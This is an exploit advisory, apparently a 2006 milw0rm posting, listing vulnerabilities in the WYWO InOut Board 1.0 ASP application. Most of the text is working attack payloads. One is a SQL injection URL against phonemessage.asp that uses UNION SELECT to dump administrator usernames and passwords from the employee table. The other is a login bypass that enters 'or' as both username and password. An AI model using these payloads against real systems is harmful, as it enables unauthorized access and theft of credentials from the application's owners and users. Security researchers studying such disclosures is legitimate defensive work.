******************************************************************************* # Title : WYWO - InOut Board 1.0 Multiple Vulnerabilities # Author : ajann # Contact : :( # S.Page : http://cybercoded.com # $$ : 9.95 $ ******************************************************************************* [[SQL]]]--------------------------------------------------------- http://[target]/[path/phonemessage.asp?num=[SQL] Example: //phonemessage.asp?num=-1%20union%20select%200,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0%20from%20employee%20where%20Admin='Yes' [[/SQL]] [[Login ByPass]]]--------------------------------------------------------- http://[target]/[path]//faqDsp.asp?catcode=[SQL] Example: //login.asp Username: 'or' Password: 'or' [[/Login ByPass]] """"""""""""""""""""" # ajann,Turkey # ... # Im not Hacker! # milw0rm.com [2006-12-28]